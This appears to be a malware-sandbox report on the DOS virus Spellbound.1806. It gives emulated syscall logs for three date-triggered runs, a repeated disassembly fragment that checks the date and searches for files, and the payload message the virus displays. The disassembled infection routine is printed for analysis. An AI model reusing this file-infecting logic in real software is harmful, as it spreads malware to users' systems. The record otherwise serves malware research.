Sample viewer

vx.netlux.org/Virus.DOS.Spellbound.1806

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:49:28.892898429Z 37 PC: 12b27 | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T22:49:28.894667463Z 37 PC: 12b2b | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T22:49:28.896976652Z 74 PC: 12b36 | Reallocate memory
2018-12-17T22:49:28.898557272Z 72 PC: 12b3d | Allocate memory
2018-12-17T22:49:28.900248459Z 37 PC: 12b49 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:49:28.906232482Z 42 PC: 12b4d | Get date 0x12b4d: cmp dl, 1
0x12b50: jne 0x12b5c
0x12b52: mov ah, 9
0x12b54: mov dx, 0x15c
0x12b57: int 0x21
0x12b59: call 0x12c77
0x12b5c: mov dx, 0x157
0x12b5f: mov ah, 0x4e
0x12b61: int 0x21
0x12b63: jae 0x12b6a
0x12b65: xor al, al
0x12b67: out 0x21, al
0x12b69: ret
0x12b6a: mov ax, 0x4300
0x12b6d: mov dx, 0x9e
0x12b70: int 0x21
0x12b72: push cx
0x12b73: mov ax, 0x4301
0x12b76: xor cx, cx
0x12b78: int 0x21
2018-12-17T22:49:28.909059653Z 78 PC: 12b63 | Find first file
2018-12-17T22:49:28.916167177Z 67 PC: 12b72 | Get or set file attributes
2018-12-17T22:49:28.923958715Z 67 PC: 12b7a | Get or set file attributes

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9900,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:24:01.380902705Z 37 PC: 12b27 | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-25T12:24:01.382629779Z 37 PC: 12b2b | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-25T12:24:01.383745178Z 74 PC: 12b36 | Reallocate memory
2018-12-25T12:24:01.385018855Z 72 PC: 12b3d | Allocate memory
2018-12-25T12:24:01.387440791Z 37 PC: 12b49 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:24:01.388511025Z 42 PC: 12b4d | Get date 0x12b4d: cmp dl, 1
0x12b50: jne 0x12b5c
0x12b52: mov ah, 9
0x12b54: mov dx, 0x15c
0x12b57: int 0x21
0x12b59: call 0x12c77
0x12b5c: mov dx, 0x157
0x12b5f: mov ah, 0x4e
0x12b61: int 0x21
0x12b63: jae 0x12b6a
0x12b65: xor al, al
0x12b67: out 0x21, al
0x12b69: ret
0x12b6a: mov ax, 0x4300
0x12b6d: mov dx, 0x9e
0x12b70: int 0x21
0x12b72: push cx
0x12b73: mov ax, 0x4301
0x12b76: xor cx, cx
0x12b78: int 0x21
2018-12-25T12:24:01.390542173Z 9 PC: 12b59 | Display string (String= 'Prime Evil! (C) Spellbound, Line Noise 1992. Coded in Stockholm, Sweden. Please spell my name right!')
2018-12-25T12:24:01.399173013Z 78 PC: 12b63 | Find first file
2018-12-25T12:24:01.407660484Z 67 PC: 12b72 | Get or set file attributes
2018-12-25T12:24:01.414106033Z 67 PC: 12b7a | Get or set file attributes

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9900,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:24:02.171556943Z 37 PC: 12b27 | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-25T12:24:02.17360627Z 37 PC: 12b2b | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-25T12:24:02.17473553Z 74 PC: 12b36 | Reallocate memory
2018-12-25T12:24:02.175911689Z 72 PC: 12b3d | Allocate memory
2018-12-25T12:24:02.178136987Z 37 PC: 12b49 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:24:02.180277668Z 42 PC: 12b4d | Get date 0x12b4d: cmp dl, 1
0x12b50: jne 0x12b5c
0x12b52: mov ah, 9
0x12b54: mov dx, 0x15c
0x12b57: int 0x21
0x12b59: call 0x12c77
0x12b5c: mov dx, 0x157
0x12b5f: mov ah, 0x4e
0x12b61: int 0x21
0x12b63: jae 0x12b6a
0x12b65: xor al, al
0x12b67: out 0x21, al
0x12b69: ret
0x12b6a: mov ax, 0x4300
0x12b6d: mov dx, 0x9e
0x12b70: int 0x21
0x12b72: push cx
0x12b73: mov ax, 0x4301
0x12b76: xor cx, cx
0x12b78: int 0x21
2018-12-25T12:24:02.182915197Z 78 PC: 12b63 | Find first file
2018-12-25T12:24:02.189323734Z 67 PC: 12b72 | Get or set file attributes
2018-12-25T12:24:02.20213831Z 67 PC: 12b7a | Get or set file attributes